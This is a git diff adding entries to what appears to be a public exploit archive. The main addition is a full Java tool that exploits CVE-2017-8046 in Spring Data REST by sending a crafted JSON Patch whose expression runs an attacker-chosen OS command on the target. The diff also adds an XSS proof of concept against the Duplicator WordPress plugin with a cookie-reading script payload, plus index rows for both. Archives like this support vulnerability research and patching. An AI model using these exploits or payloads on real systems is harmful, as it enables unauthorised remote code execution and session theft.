diff --git a/exploits/java/webapps/44289.java b/exploits/java/webapps/44289.java new file mode 100644 index 000000000..a4a2b26ba --- /dev/null +++ b/exploits/java/webapps/44289.java @@ -0,0 +1,451 @@ +// Exploit Title: RCE in PATCH requests in Spring Data REST +// Date: 2018-03-10 +// Exploit Author: Antonio Francesco Sardella +// Vendor Homepage: https://pivotal.io/ +// Software Link: https://projects.spring.io/spring-data-rest/ +// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1) +// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE' +// CVE: CVE-2017-8046 +// Category: Webapps +// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046 +// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp +// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com + +package com.afs.exploit.spring; + +import java.io.BufferedReader; +import java.io.IOException; +import java.io.InputStreamReader; +import java.net.URI; +import java.net.URISyntaxException; + +import org.apache.http.HttpResponse; +import org.apache.http.client.HttpClient; +import org.apache.http.client.methods.HttpPatch; +import org.apache.http.entity.StringEntity; +import org.apache.http.impl.client.HttpClientBuilder; + +/** + * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). + * This software is written to have as less external dependencies as possible. + * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please + * use this tool responsibly. I do not take responsibility for the way in which any one uses this application. + * I am NOT responsible for any damages caused or any crimes committed by using this tool. + * .................. + * . CVE-ID ........: CVE-2017-8046 + * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 + * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST + * .................. versions prior to 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring + * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary + * .................. Java code. + * .................. + * + * @author Antonio Francesco Sardella + */ +public class SpringBreakCve20178046 { + + /** + * Version string. + */ + private static final String VERSION = "v1.0 (2018-03-10)"; + + /** + * The JSON Patch object. + */ + private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"replace\", \"path\" : \"%s\", \"value\" : \"pwned\" }]"; + + /** + * This is a way to bypass the split and 'replace' + * logic performed by the framework on slashes. + */ + private static String SLASH = "T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))"; + + /** + * Used to encode chars. + */ + private static String CHAR_ENCODING = "T(java.lang.Character).toChars(%d)[0]"; + + /** + * Malicious payload. + */ + private static String PAYLOAD; + + /** + * Malicious payload initialization. + */ + static { + PAYLOAD = "T(org.springframework.util.StreamUtils).copy("; + PAYLOAD += "T(java.lang.Runtime).getRuntime().exec("; + PAYLOAD += "("; + PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")"; + PAYLOAD += "?"; + PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\""; + PAYLOAD += ":"; + PAYLOAD += "\\\"\\\""; + PAYLOAD += ")+"; + PAYLOAD += "%s"; // The encoded command will be placed here. + PAYLOAD += ").getInputStream()"; + PAYLOAD += ","; + PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()"; + PAYLOAD += ".getResponse().getOutputStream()"; + PAYLOAD += ").x"; + } + + /** + * Error cause string that can be used to "clean the response." + */ + private static String ERROR_CAUSE = "{\"cause"; + + /** + * The target URL. + */ + private URI url; + + /** + * The command that will be executed on the remote machine. + */ + private String command; + + /** + * Cookies that will be passed. + */ + private String cookies; + + /** + * Flag used to remove error messages in output due to + * the usage of the exploit. It could hide error messages + * if the request fails for other reasons. + */ + private boolean cleanResponse; + + /** + * Verbosity flag. + */ + private boolean verbose; + + /** + * Default constructor. + */ + public SpringBreakCve20178046() { + this.verbose = false; + this.cleanResponse = false; + } + + /** + * Performs the exploit. + * + * @throws IOException + * If something bad occurs during HTTP GET. + */ + public void exploit() throws IOException { + checkInput(); + printInput(); + String payload = preparePayload(); + String response = httpPatch(payload); + printOutput(response); + } + + /** + * Checks the input. + */ + private void checkInput() { + if (this.url == null) { + throw new IllegalArgumentException("URL must be passed."); + } + + if (isEmpty(this.command)) { + throw new IllegalArgumentException("Command must be passed."); + } + } + + /** + * Prints input if verbose flag is true. + */ + private void printInput() { + if (isVerbose()) { + System.out.println("[*] Target URL ........: " + this.url); + System.out.println("[*] Command ...........: " + this.command); + System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies)); + } + } + + /** + * Prepares the payload. + * + * @return The malicious payload that will be injected. + */ + private String preparePayload() { + System.out.println("[*] Preparing payload."); + + String command = encodingCommand(); // Encoding inserted command. + String payload = String.format(PAYLOAD, command); // Preparing Java payload. + payload = String.format(JSON_PATCH_OBJECT, payload); // Placing payload into JSON Patch object. + + if (isVerbose()) { + System.out.println("[*] Payload ...........: " + payload); + } + + return payload; + } + + /** + * Encodes the inserted command. + * PROS: No problems in interpreting things. + * CONS: Payload too long. + * + * @return The encoded command. + */ + private String encodingCommand() { + StringBuffer encodedCommand = new StringBuffer("T(java.lang.String).valueOf(new char[]{"); + + int commandLength = this.command.length(); + for (int i = 0; i < commandLength; i++) { + encodedCommand.append(String.format(CHAR_ENCODING, (int) this.command.charAt(i))); + if (i + 1 < commandLength) { + encodedCommand.append(","); + } + } + + encodedCommand.append("})"); + + if (isVerbose()) { + System.out.println("[*] Encoded command ...: " + encodedCommand.toString()); + } + + return encodedCommand.toString(); + } + + /** + * HTTP PATCH operation on the target passing the malicious payload. + * + * @param payload + * The malicious payload. + * @return The response as a string. + * @throws IOException + * If something bad occurs during HTTP GET. + */ + private String httpPatch(String payload) throws IOException { + System.out.println("[*] Sending payload."); + + // Preparing PATCH operation. + HttpClient client = HttpClientBuilder.create().build(); + HttpPatch patch = new HttpPatch(this.url); + patch.setHeader("User-Agent", "Mozilla/5.0"); + patch.setHeader("Accept-Language", "en-US,en;q=0.5"); + patch.setHeader("Content-Type", "application/json-patch+json"); // This is a JSON Patch. + if (!isEmpty(this.cookies)) { + patch.setHeader("Cookie", this.cookies); + } + patch.setEntity(new StringEntity(payload)); + + // Response string. + StringBuffer response = new StringBuffer(); + + // Executing PATCH operation. + HttpResponse httpResponse = client.execute(patch); + if (httpResponse != null) { + + // Reading response code. + if (httpResponse.getStatusLine() != null) { + int responseCode = httpResponse.getStatusLine().getStatusCode(); + System.out.println("[*] HTTP " + responseCode); + } else { + System.out.println("[!] HTTP response code can't be read."); + } + + // Reading response content. + if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) { + BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent())); + String inputLine; + + while ((inputLine = in.readLine()) != null) { + response.append(inputLine); + response.append(System.getProperty("line.separator")); + } + in.close(); + } else { + System.out.println("[!] HTTP response content can't be read."); + } + + } else { + System.out.println("[!] HTTP response is null."); + } + + return response.toString(); + } + + /** + * Prints output. + * + * @param response + * Response that will be printed. + */ + private void printOutput(String response) { + if (!isEmpty(response)) { + System.out.println("[*] vvv Response vvv"); + + // Cleaning response (if possible). + if (isCleanResponse() && response.contains(ERROR_CAUSE)) { + String cleanedResponse = response.split("\\" + ERROR_CAUSE)[0]; + System.out.println(cleanedResponse); + } else { + System.out.println(response); + } + + System.out.println("[*] ^^^ ======== ^^^"); + } + } + + /** + * Checks if an input string is null/empty or not. + * + * @param input + * The input string to check. + * @return True if the string is null or empty, false otherwise. + */ + private boolean isEmpty(String input) { + boolean isEmpty; + + if (input == null || input.trim().length() < 1) { + isEmpty = true; + } else { + isEmpty = false; + } + + return isEmpty; + } + + /* Getters and setters. */ + + public boolean isVerbose() { + return verbose; + } + + public void setVerbose(boolean verbose) { + this.verbose = verbose; + } + + public void setUrl(String url) throws URISyntaxException { + if (isEmpty(url)) { + throw new IllegalArgumentException("URL must be not null and not empty."); + } + + this.url = new URI(url.trim()); + } + + public void setCommand(String command) { + if (isEmpty(command)) { + throw new IllegalArgumentException("Command must be not null and not empty."); + } + + this.command = command.trim(); + } + + public void setCookies(String cookies) { + if (cookies != null) { + cookies = cookies.trim(); + } + + this.cookies = cookies; + } + + public boolean isCleanResponse() { + return cleanResponse; + } + + public void setCleanResponse(boolean cleanResponse) { + this.cleanResponse = cleanResponse; + } + + /** + * Shows the program help. + */ + public static final void help() { + System.out.println("Usage:"); + System.out.println(" java -jar spring-break_cve-2017-8046.jar [options]"); + System.out.println("Description:"); + System.out.println(" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046)."); + System.out.println("Options:"); + System.out.println(" -h, --help"); + System.out.println(" Prints this help and exits."); + System.out.println(" -u, --url [target_URL]"); + System.out.println(" The target URL where the exploit will be performed."); + System.out.println(" You have to choose an existent resource."); + System.out.println(" -cmd, --command [command_to_execute]"); + System.out.println(" The command that will be executed on the remote machine."); + System.out.println(" --cookies [cookies]"); + System.out.println(" Optional. Cookies passed into the request, e.g. authentication cookies."); + System.out.println(" --clean"); + System.out.println(" Optional. Removes error messages in output due to the usage of the"); + System.out.println(" exploit. It could hide error messages if the request fails for other reasons."); + System.out.println(" -v, --verbose"); + System.out.println(" Optional. Increase verbosity."); + } + + /** + * Main method. + * + * @param args + * Input arguments + */ + public static void main(String[] args) { + try { + System.out.println("'Spring Break' RCE (CVE-2017-8046) - " + VERSION); + SpringBreakCve20178046 o = new SpringBreakCve20178046(); + + if (args.length > 0) { + for (int i = 0; i < args.length; i++) { + + String p = args[i]; + + if (("-h".equals(p) || "--help".equals(p)) && i == 0) { + SpringBreakCve20178046.help(); + return; + } else if ("-u".equals(p) || "--url".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("URL must be passed."); + } + o.setUrl(args[++i]); + + } else if ("-cmd".equals(p) || "--command".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Command must be passed."); + } + o.setCommand(args[++i]); + + } else if ("--cookies".equals(p)) { + + if (i + 1 > args.length - 1) { + throw new IllegalArgumentException("Cookies must be passed, if specified."); + } + o.setCookies(args[++i]); + + } else if ("--clean".equals(p)) { + o.setCleanResponse(true); + } else if ("-v".equals(p) || "--verbose".equals(p)) { + o.setVerbose(true); + } + + } + + // Performing the exploit. + o.exploit(); + + } else { // Wrong number of arguments. + SpringBreakCve20178046.help(); + return; + } + + } catch (URISyntaxException use) { + System.out.println("[!] Input error (URI syntax exception): " + use.getMessage()); + } catch (IllegalArgumentException iae) { + System.out.println("[!] Input error (illegal argument): " + iae.getMessage()); + } catch (Exception e) { + System.out.println("[!] Unexpected exception: " + e.getMessage()); + e.printStackTrace(); + } + } + +} \ No newline at end of file diff --git a/exploits/multiple/webapps/24320.py b/exploits/multiple/webapps/24320.py index 3dd94080b..d9886d61f 100755 --- a/exploits/multiple/webapps/24320.py +++ b/exploits/multiple/webapps/24320.py @@ -1,3 +1,6 @@ +#!/usr/bin/env python + +''' Description: =============================================================== Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability @@ -31,6 +34,7 @@ Find: SQLiteStripSlashes($_POST['dbpath']) Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath'])) On File: ./include/add_database.php =============================================================== +''' and None import re import urllib2 diff --git a/exploits/php/webapps/44288.txt b/exploits/php/webapps/44288.txt new file mode 100644 index 000000000..164bb0c1c --- /dev/null +++ b/exploits/php/webapps/44288.txt @@ -0,0 +1,69 @@ +# Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting (XSS) +# Date: 25-02-2018 +# Exploit Author : Stefan Broeder +# Contact : https://twitter.com/stefanbroeder +# Vendor Homepage: https://snapcreek.com/ +# Software Link: https://wordpress.org/plugins/duplicator/ +# Version: 1.2.32 +# CVE : CVE-2018-7543 +# Category : webapps + +Description +=========== +Duplicator is a wordpress plugin with more than 1 million of active installations. Version 1.2.32 (and possibly previous versionss) are affected by a Reflected XSS vulnerability. + +Vulnerable part of code +======================= +File: duplicator/installer/build/view.step4.php:254 allows direct injection of $_POST variable 'json'. + +Impact +====== +Arbitrary JavaScript code can be run on browser side if a user is tricked to click over a link or browse a URL under the attacker control. + +Proof of Concept +============ +In order to exploit this vulnerability, an attacker has to send the following request to the server: + +POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198 +Connection: close +Upgrade-Insecure-Requests: 1 +Pragma: no-cache +Cache-Control: no-cache +Content-Type: application/x-www-form-urlencoded +Content-Length: 91 + +json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d'' + +The server replies as reported below: + +HTTP/1.1 200 OK +Date: Mon, 12 Feb 2018 14:15:28 GMT +Server: Apache/2.4.29 (Debian) +Vary: Accept-Encoding +Content-Length: 10224 +Connection: close +Content-Type: text/html; charset=UTF-8 + +... + + + +Solution +======== + +Update to version 1.2.33 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 30a1fc024..955f27f3e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -39000,3 +39000,5 @@ id,file,description,date,author,type,platform,port 44281,exploits/windows/webapps/44281.txt,"ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution",2018-03-12,Clutchisback1,webapps,windows, 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx, 44286,exploits/php/webapps/44286.txt,"Tuleap 9.17.99.189 - Blind SQL Injection",2018-03-13,"Cristiano Maruti",webapps,php, +44288,exploits/php/webapps/44288.txt,"WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting",2018-03-15,"Stefan Broeder",webapps,php,80 +44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,